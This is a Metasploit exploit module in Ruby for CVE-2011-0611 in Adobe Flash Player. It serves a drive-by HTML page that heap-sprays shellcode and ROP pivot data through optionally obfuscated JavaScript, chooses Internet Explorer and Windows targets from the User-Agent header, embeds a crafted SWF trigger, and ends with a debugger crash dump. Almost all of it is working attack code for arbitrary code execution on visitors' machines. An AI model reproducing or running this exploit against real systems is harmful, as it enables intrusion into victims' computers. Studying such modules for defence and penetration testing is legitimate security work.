##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
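class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  # Module metadata: references, payload constraints, and the per-browser
  # spray/pivot parameters that on_request_uri reads from the selected target.
  # Target 0 ('Automatic') carries no parameters; it is resolved to one of the
  # explicit targets from the User-Agent header at request time (see get_target).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",
        'Description' => %q{
          This module exploits a vulnerability in Adobe Flash Player that was discovered,
          and has been exploited actively in the wild. By embedding a specially crafted .swf
          file, Adobe Flash crashes due to an invalid use of an object type, which allows
          attackers to overwrite a pointer in memory, and results arbitrary code execution.
          Please note for IE 8 targets, Java Runtime Environment must be available on the
          victim machine in order to work properly.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sinn3r',
        ],
        'References' => [
          [ 'CVE', '2011-0611' ],
          [ 'OSVDB', '71686' ],
          [ 'BID', '47314' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],
          [ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],
          [ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],
          [ 'URL', 'http://web.archive.org/web/20110417154057/http://secunia.com:80/blog/210/' ],
        ],
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00",
        },
        'DefaultOptions' => {
          'EXITFUNC' => "process",
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Platform' => 'win',
        # Each explicit target's hash is read by on_request_uri:
        #   'Rop'     - whether generate_rop_payload('java', ...) is used
        #   'Pivot'   - stack-pivot address packed into the fake-pointer block (ROP targets only)
        #   'Offset1' / 'Max1' - offset and iteration count for the payload spray
        #   'Offset2' / 'Max2' - offset and iteration count for the fake-pointer spray
        # Offsets and maxima are JavaScript numeric literals interpolated verbatim.
        'Targets' => [
          [ 'Automatic', {} ],
          [
            'IE 6 on Windows XP SP3',
            {
              'Rop' => false,
              'Pivot' => nil, # No ROP no pivot
              'Offset1' => '0x01', # For aligning the payload
              'Offset2' => '0x02', # For aligning the CALL
              'Max1' => '0x150', # First spray
              'Max2' => '0x200' # Second spray
            }
          ],
          [
            'IE 7 on Windows XP SP3',
            {
              'Rop' => false,
              'Pivot' => nil, # No ROP no pivot
              'Offset1' => '0x01', # For aligning the payload
              'Offset2' => '0x02', # For aligning the CALL
              'Max1' => '0x150', # First spray
              'Max2' => '0x200' # Second spray
            }
          ],
          [
            'IE 8 on Windows XP SP3',
            {
              'Rop' => true,
              'Pivot' => 0x7c348b05, # XCHG EAX,ESP; RETN (MSVCR71.dll)
              'Offset1' => '0x5E2', # Offset for rop+payload
              'Offset2' => '0x02', # Offset to 0x11111110
              'Max1' => '0x250', # First spray
              'Max2' => '0x200' # Second spray
            }
          ],
          [
            'IE 7 on Windows Vista',
            {
              'Rop' => false,
              'Pivot' => nil, # No ROP no pivot
              'Offset1' => '0x01', # For aligning the payload
              'Offset2' => '0x02', # For aligning the CALL
              'Max1' => '0x150', # First spray
              'Max2' => '0x200' # Second spray
            }
          ],
          [
            'IE 8 on Windows 7',
            {
              'Rop' => true,
              'Pivot' => 0x7c348b05, # XCHG EAX,ESP; RETN (MSVCR71.dll)
              'Offset1' => '0x5F4', # Offset for rop+payload
              'Offset2' => '0x02', # Offset to 0x11111110
              'Max1' => '0x101', # First spray
              'Max2' => '0x300' # Second spray
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-04-11',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
      ], self.class
    )
  end

  # Loads the trigger SWF shipped in the framework data directory into memory
  # before the HTTP server is started, so each request is served from @trigger.
  #
  # @raise [Errno::ENOENT] if the data file is not present in the install
  def exploit
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-0611.swf")
    # binread opens in binary mode, reads the whole file and always closes the
    # handle, so a read error cannot leak the descriptor.
    @trigger = File.binread(path)
    super
  end

  # Resolves the 'Automatic' target from the client's User-Agent header.
  # The header is client-supplied and only pattern-matched; nothing from it is
  # interpolated into the response.
  #
  # @param request [Rex::Proto::Http::Request] the incoming HTTP request
  # @return [Msf::Module::Target, nil] the matching explicit target, or nil when
  #   the agent string is not one the module recognises (the caller sends a 404)
  def get_target(request)
    agent = request.headers['User-Agent']

    if agent =~ /NT 5\.1/ && agent =~ /MSIE 6\.0/
      # Windows XP SP3 + IE 6.0
      targets[1]
    elsif agent =~ /NT 5\.1/ && agent =~ /MSIE 7\.0/
      # Windows XP SP3 + IE 7.0
      targets[2]
    elsif agent =~ /NT 5\.1/ && agent =~ /MSIE 8\.0/
      # Windows XP SP3 + IE 8.0 + JRE6
      targets[3]
    elsif agent =~ /NT 6\.0/ && agent =~ /MSIE 7\.0/
      # Windows Vista + IE 7
      targets[4]
    elsif agent =~ /NT 6\.1/ && agent =~ /MSIE 8\.0/
      # Windows 7 + IE 8 + JRE6
      targets[5]
    else
      nil
    end
  end

  # HTTP handler. Requests ending in .swf receive the trigger file loaded by
  # #exploit; every other request receives the HTML page that performs the
  # heap spray and embeds the trigger. Unknown user agents get a 404 when the
  # 'Automatic' target is selected.
  #
  # @param cli [Rex::Socket] the client connection
  # @param request [Rex::Proto::Http::Request] the incoming HTTP request
  # @return [void]
  def on_request_uri(cli, request)
    # Set default target
    my_target = target

    # If user chooses automatic target, we choose one based on user agent
    if my_target.name =~ /Automatic/
      my_target = get_target(request)
      if my_target.nil?
        print_error("Sending 404 for unknown user-agent")
        send_not_found(cli)
        return
      end
      vprint_status("Target selected: #{my_target.name}")
    end

    vprint_status("URL: #{request.uri}")

    if request.uri =~ /\.swf$/
      # Browser requests our trigger file, why not
      print_status("Sending trigger SWF...")
      send_response(cli, @trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    # Targets that don't need ROP
    pivot = "\xb8\x0c\x0c\x0c\x0c" # MOV EAX,0x0c0c0c0c
    pivot << "\xff\xe0" # JMP EAX
    pivot << "\x41" # Pad

    # Targets that need ROP
    if my_target['Rop']
      # Target Addr=0x11111110
      pivot =
        [
          0x0c0c0c0c, # Padding. Value for ESP after the XCHG pivot
          my_target['Pivot'], # ROP Pivot
          0x7c346b52, # EAX (POP ESP; RETN)
        ].pack('V*')

      # Target Addr=0x0c0c0c0c
      p = generate_rop_payload('java', payload.encoded)
    else
      p = payload.encoded
    end

    arch = Rex::Arch.endian(my_target.arch)

    # Both buffers are emitted as JavaScript %u-escaped strings
    shellcode = Rex::Text.to_unescape(p, arch)
    pivot = Rex::Text.to_unescape(pivot, arch)

    # Extract string based on target
    if my_target.name == 'IE 8 on Windows 7'
      js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"
    elsif my_target.name == 'IE 8 on Windows XP SP3'
      js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
    else
      js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
    end

    # Random identifier for the nop-string variable; the value itself is fixed
    randnop = rand_text_alpha(rand(100) + 1)
    js_nops = Rex::Text.to_unescape("\x0c" * 4)

    js = <<-JS
      function heap_spray(heaplib, nops, code, offset, max) {
        while (nops.length < 0x2000) nops += nops;
        var offset = nops.substring(0, offset);
        var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);
        while (shellcode.length < 0x40000) shellcode += shellcode;
        #{js_extract_str}
        heaplib.gc();
        for (var i=1; i<max; i++) {
          heaplib.alloc(block);
        }
      }

      var heap_obj = new heapLib.ie(0x20000);
      var #{randnop} = "#{js_nops}";
      var nops = unescape(#{randnop});
      var code = unescape("#{shellcode}");
      heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
      var fake_pointers = unescape("#{pivot}");
      heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});
    JS

    # heapLib is prepended un-obfuscated; obfuscation of the whole script is
    # decided by the OBFUSCATE option below
    js = heaplib(js, { :noobfu => true })

    # Javascript obfuscation is optional
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate(memory_sensitive: true)
    end

    # rand(3) may be 0, in which case the name is just ".swf"; it still matches
    # the /\.swf$/ check above
    trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"

    html = <<-EOS
    <html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{trigger_file_name}" />
    <embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"
    pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>
    </body>
    </html>
    EOS

    # Strip the heredoc's leading indentation from every line
    html = html.gsub(/^ {4}/, "")

    print_status("Sending HTML to #{cli.peerhost}...")
    send_response(cli, html, { 'Content-Type' => "text/html" })
  end
end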
=begin
0:000> r
eax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0
eip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
Flash10o+0xd01f6:
100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????
0:000> dd ecx
01d650b0 11111110 00000000 00000000 00000000
01d650c0 00000000 00000000 00000000 00000000
01d650d0 00000000 00000000 00000000 00000000
01d650e0 00000000 00000000 00000000 00000000
01d650f0 00000000 00000000 00000000 00000000
01d65100 00000000 00000000 00000000 00000000
01d65110 00000000 00000000 00000000 00000000
01d65120 00000000 00000000 00000000 00000000

=end